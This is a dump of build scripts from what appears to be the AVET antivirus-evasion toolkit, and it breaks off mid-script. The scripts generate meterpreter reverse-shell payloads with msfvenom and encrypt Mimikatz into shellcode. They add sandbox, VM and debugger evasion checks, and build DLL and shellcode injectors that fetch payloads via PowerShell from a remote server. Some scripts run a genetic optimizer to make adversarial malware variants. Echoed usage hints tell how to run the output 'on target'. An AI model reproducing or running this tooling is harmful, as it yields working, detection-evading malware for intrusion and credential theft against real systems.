#!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . 
build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="extend" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_padding.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . 
build/feature_construction.sh 13 | 14 | 15 | 16 | 17 | 18 | FILES="input/malware-filtered2/*" 19 | N=3 20 | practical_manipulation="padding" 21 | population_size=100 22 | section_size=5 23 | 24 | for f in $FILES 25 | do 26 | ((i=i%N)); ((i++==0)) && wait 27 | 28 | ( cp $f output/ 29 | # generate adversarial example 30 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 31 | 32 | # cleanup 33 | rm output/$(basename "$f") 34 | # cleanup_techniques 35 | ) & 36 | done 37 | 38 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_shift.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . 
build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="shift" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_si.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="section_injection" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_fibonacci_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Performs a small amount of dummy computations before executing the payload. 
5 | # This small number of iterations is unlikely to timeout real-world sandboxes. This script is included for experimental reasons. 6 | # RC4-encrypt the payload with a static, preset key. 7 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 8 | # pe_to_shellcode is written by Hasherezade: 9 | # https://github.com/hasherezade/pe_to_shellcode 10 | 11 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 12 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 13 | #DESCRIPTION_END 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win64_compiler 19 | # you can edit the compiler in build/global_win64.sh 20 | # or enter $win64_compiler="mycompiler" here 21 | . build/global_win64.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # generate key file with preset key 31 | generate_key preset aabbccdd1122 input/key_raw.txt 32 | #CONFIGURATION_END 33 | 34 | ## compute one million elements of the fibonacci series before payload execution 35 | add_evasion computation_fibonacci 1000000 36 | 37 | # no command execution 38 | set_command_source no_data 39 | set_command_exec no_command 40 | 41 | # convert mimikatz executable into shellcode format 42 | # Can be of course used with other .exe files 43 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 44 | # encrypt payload 45 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 46 | 47 | # convert encoded, raw payload into c format for static include 48 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 49 | 50 | # set payload source 51 | set_payload_source static_from_file input/sc_enc_c.txt 52 | 53 | # set decoder 54 | set_decoder rc4 55 | 
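56 | # convert key to c format and include statically 57 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 58 | set_key_source static_from_file input/key_c.txt 59 | 60 | # set payload info source 61 | set_payload_info_source no_data 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode64 65 | 66 | 67 | # compile to exe file (the output name is repeated in the usage hint echoed below, keep both in sync) 68 | $win64_compiler -o output/fibonacci_rc4_mimikatz.exe source/avet.c 69 | strip output/fibonacci_rc4_mimikatz.exe 70 | 71 | # cleanup 72 | cleanup_techniques 73 | 74 | 75 | echo " 76 | # The decryption key is aabbccdd1122 if it has not been changed. 77 | # You need to provide the decryption key as 2nd command line argument. 78 | # Call generated executable on target like: 79 | # $ fibonacci_rc4_mimikatz.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 80 | " 81 | -------------------------------------------------------------------------------- /build/build_fopen_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Executes 64-bit shellcode. 6 | # Uses Metasploit's xor encoding. Uses fopen sandbox evasion. 7 | #DESCRIPTION_END 8 | 9 | 10 | # include script containing the compiler var $win64_compiler 11 | # you can edit the compiler in build/global_win64.sh 12 | # or enter $win64_compiler="mycompiler" here 13 | . build/global_win64.sh 14 | 15 | # import feature construction interface 16 | . build/feature_construction.sh 17 | 18 | # import global default lhost and lport values from build/global_connect_config.sh 19 | .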
build/global_connect_config.sh 20 | 21 | 22 | #CONFIGURATION_START 23 | # override connect-back settings here, if necessary 24 | LPORT=$GLOBAL_LPORT 25 | LHOST=$GLOBAL_LHOST 26 | # no command preexec 27 | set_command_source no_data 28 | set_command_exec no_command 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload 35 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f c --platform Windows > input/sc_c.txt 36 | 37 | # add fopen sandbox evasion technique 38 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 39 | 40 | # set shellcode source 41 | set_payload_source static_from_file input/sc_c.txt 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode64 52 | 53 | 54 | # compile 55 | $win64_compiler -o output/fopen_mtrprtrxor_revhttps_win64.exe source/avet.c 56 | strip output/fopen_mtrprtrxor_revhttps_win64.exe 57 | 58 | # cleanup 59 | cleanup_techniques 60 | 61 | echo " 62 | # Execute the following command: 63 | # $ fopen_mtrprtrxor_revhttps_win64.exe 64 | " -------------------------------------------------------------------------------- /build/build_fopen_quiet_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Perform fopen sandbox evasion, encode with shikata and hide console window. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . 
build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion fopen_sandbox_evasion 'C:\\windows\\system.ini' 41 | # enable quiet mode / hide console window 42 | add_evasion hide_console 43 | 44 | # set shellcode source 45 | set_payload_source static_from_file input/sc_c.txt 46 | 47 | # set decoder and key source 48 | set_decoder none 49 | set_key_source no_data 50 | 51 | # set payload info source 52 | set_payload_info_source no_data 53 | 54 | #set shellcode binding technique 55 | set_payload_execution_method exec_shellcode 56 | 57 | # compile 58 | $win32_compiler -o output/fopen_quiet_revhttps_win32.exe source/avet.c 59 | strip output/fopen_quiet_revhttps_win32.exe 60 | 61 | # cleanup 62 | cleanup_techniques 63 | 64 | 65 | echo " 66 | # Execute the following command: 67 | # $ fopen_quiet_revhttps_win32.exe 68 | " 69 | -------------------------------------------------------------------------------- /build/build_fopen_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform fopen sandbox evasion. 
6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile 56 | $win32_compiler -o output/fopen_revhttps_win32.exe source/avet.c 57 | strip output/fopen_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ fopen_revhttps_win32.exe 66 | " 67 | -------------------------------------------------------------------------------- /build/build_getchar_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Wait for input 
via getchar() before executing the payload. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## Call getchar to provoke user interaction 34 | add_evasion interaction_getchar 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | 
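set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file (the output name is repeated in the usage hint echoed below, keep both in sync) 67 | $win64_compiler -o output/getchar_rc4_mimikatz.exe source/avet.c 68 | strip output/getchar_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ getchar_rc4_mimikatz.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_gethostbyname_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform gethostbyname sandbox evasion. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | .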
build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add gethostbyname sandbox evasion 40 | add_evasion gethostbyname_sandbox_evasion 'this.that' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | 56 | # compile 57 | $win32_compiler -o output/gethostbyname_revhttps_win32.exe source/avet.c -lws2_32 58 | strip output/gethostbyname_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ gethostbyname_revhttps_win32.exe 67 | " -------------------------------------------------------------------------------- /build/build_has_process_exit_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and exit if a given process is found 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . 
build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add has_process_exit, just quit if the process is running 40 | add_evasion has_process_exit 'iexplore.exe' 41 | 42 | # note: it is possible to add several lines if program should quit on multiple processes, like: 43 | # add_evasion has_process_exit 'OLLYDBG.EXE' 44 | 45 | # set shellcode source 46 | set_payload_source static_from_file input/sc_c.txt 47 | 48 | # set decoder and key source 49 | set_decoder none 50 | set_key_source no_data 51 | 52 | # set payload info source 53 | set_payload_info_source no_data 54 | 55 | # set shellcode binding technique 56 | set_payload_execution_method exec_shellcode 57 | 58 | 59 | # compile, bit dirty with fpermissive (NOTE(review): this uses $win32cpp_compiler, not the $win32_compiler documented above; make sure build/global_win32.sh defines it) 60 | $win32cpp_compiler -fpermissive -o output/has_process_exit_revhttps_win32.exe source/avet.c -lws2_32 61 | strip output/has_process_exit_revhttps_win32.exe 62 | 63 | # cleanup 64 | cleanup_techniques 65 | 66 | 67 | echo " 68 | # Execute the following command: 69 | # $ has_process_exit_revhttps_win32.exe 70 | " -------------------------------------------------------------------------------- /build/build_hasvmkey_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform has_vm_regkey evasion.
6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add has_vm_regkey evasion technique, parameterized with a list of VM vendor strings 40 | add_evasion has_vm_regkey 'VMWARE,VBOX,VIRTUAL,VMware' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | # no decoder is used here, so no key is needed 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # enable debug output (NOTE(review): enable_debug_print was already called in the configuration block above; this second call looks redundant) 57 | enable_debug_print 58 | 59 | # compile to exe file 60 | $win32_compiler -o output/hasvmkey_revhttps_win32.exe source/avet.c 61 | strip output/hasvmkey_revhttps_win32.exe 62 | 63 | # cleanup 64 | cleanup_techniques 65 | 66 | 67 | echo " 68 | # Execute the following command: 69 | # $ hasvmkey_revhttps_win32.exe 70 | " 71 | -------------------------------------------------------------------------------- /build/build_hasvmmac_revtcp_win32.sh:
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform has_vm_mac evasion (meterpreter reverse_tcp payload). 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add has_vm_mac evasion technique 40 | add_evasion has_vm_mac 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | # no decoder is used here, so no key is needed 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file (ws2_32 and iphlpapi are linked for the has_vm_mac technique) 57 | $win32_compiler -o output/hasvmmac_revtcp_win32.exe source/avet.c -lws2_32 -liphlpapi 58 | strip output/hasvmmac_revtcp_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ hasvmmac_revtcp_win32.exe 67 | " 68 |
-------------------------------------------------------------------------------- /build/build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Dll injection 32-bit example build script 6 | # Creates an executable that injects a dll residing on the target's disk into a target process 7 | # Also creates an exec_calc 32-bit dll payload, and downloads the file via powershell onto the target's disk for injection 8 | # Target process and dll can be specified in the third(!) command line argument as format: pid,dll_path 9 | 10 | # The download mechanism, as deployed here, is kind of a workaround to deliver the payload to the target. 11 | # download_powershell is "abused" as payload source, so the file is downloaded and read into memory, but that buffer is not used to deliver the dll. 12 | # Instead, the dll is read from disk (again) by the inject_dll payload execution method, and injected into the target process specified in payload_info. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win32_compiler 20 | # you can edit the compiler in build/global_win32.sh 21 | # or enter $win32_compiler="mycompiler" here 22 | . build/global_win32.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | .
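build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no command preexec 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # enable debug output 39 | enable_debug_print 40 | #CONFIGURATION_END 41 | 42 | 43 | # compile exec_calc 32-bit dll payload from source (this is the dll referenced in the usage hint below) 44 | $win32_compiler test_payloads/exec_calc.c -shared -o output/exec_calc.dll 45 | 46 | # add evasion techniques 47 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 48 | add_evasion gethostbyname_sandbox_evasion 'this.that' 49 | reset_evasion_technique_counter 50 | 51 | # payload will be downloaded from HTTP source via powershell 52 | set_payload_source download_powershell 53 | 54 | # no encoding, no key 55 | # encoding/decoding would make no sense here, as the payload itself is not touched or read in by the executable after download 56 | set_key_source no_data 57 | set_decoder none 58 | 59 | # retrieve payload info (target pid, dll path) from command line on execution 60 | set_payload_info_source from_command_line_raw 61 | 62 | # set payload execution method 63 | set_payload_execution_method inject_dll 64 | 65 | # compile 66 | $win32_compiler -o output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe source/avet.c -lws2_32 67 | strip output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | echo " 73 | # Host the generated dll payload (output/exec_calc.dll) via HTTP on port 80 74 | # Call the injector executable like: 75 | # $ injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe http://yourserver/exec_calc.dll random target_pid,exec_calc.dll 76 | # 'random' just fills argv[2], which is not needed here 77 | " 78 | --------------------------------------------------------------------------------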
/build/build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Dll injection 64-bit example build script 6 | # Creates an executable that injects a dll residing on the target's disk into a target process 7 | # Also creates an exec_calc 64-bit dll payload , and downloads the file via powershell onto the target's disk for injection 8 | # Target process and dll can be specified in the third(!) command line argument as format: pid,dll_path 9 | 10 | # The download mechanism, as deployed here, is kind of a workaround to deliver the payload to the target. 11 | # download_powershell is "abused" as payload source, so the file is downloaded and read into memory, but that buffer is not used to deliver the dll. 12 | # Instead, the dll is read from disk (again) by the inject_dll payload execution method, and injected into the target process specified in payload_info. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win64_compiler 20 | # you can edit the compiler in build/global_win64.sh 21 | # or enter $win64_compiler="mycompiler" here 22 | . build/global_win64.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | . 
build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no command preexec 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # enable debug output 39 | enable_debug_print 40 | #CONFIGURATION_END 41 | 42 | 43 | # compile exec_calc 64-bit dll payload from source 44 | # the idea was to generate a meterpreter dll payload here via msfvenom, but somehow the meterpreter dll appears to be non-injectible 45 | $win64_compiler test_payloads/exec_calc.c -shared -o output/exec_calc64.dll 46 | 47 | # add evasion techniques 48 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 49 | add_evasion gethostbyname_sandbox_evasion 'this.that' 50 | reset_evasion_technique_counter 51 | 52 | # payload will be downloaded from HTTP source via powershell 53 | set_payload_source download_powershell 54 | 55 | # no encoding, no key 56 | # encoding/decoding would make no sense here, as the payload itself is not touched or read in by the executable after download 57 | set_key_source no_data 58 | set_decoder none 59 | 60 | # retrieve payload info (target pid, dll path) from command line on execution 61 | set_payload_info_source from_command_line_raw 62 | 63 | # set payload execution method 64 | set_payload_execution_method inject_dll 65 | 66 | # compile 67 | $win64_compiler -o output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe source/avet.c -lws2_32 68 | strip output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | echo " 74 | # Host the generated dll payload via HTTP on port 80 75 | # Call the injector executable like: 76 | # $ injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe http://yourserver/exec_calc64.dll random target_pid,exec_calc64.dll 77 | # 'random' just fills argv[2], which is not needed here 78 | " 
79 | -------------------------------------------------------------------------------- /build/build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Shellcode injection 64-bit example build script 6 | # Creates an executable that injects the payload into a target process 7 | # The target is specified on execution via the third(!) command line argument, by PID 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win64_compiler 15 | # you can edit the compiler in build/global_win64.sh 16 | # or enter $win64_compiler="mycompiler" here 17 | . build/global_win64.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file 34 | generate_key preset 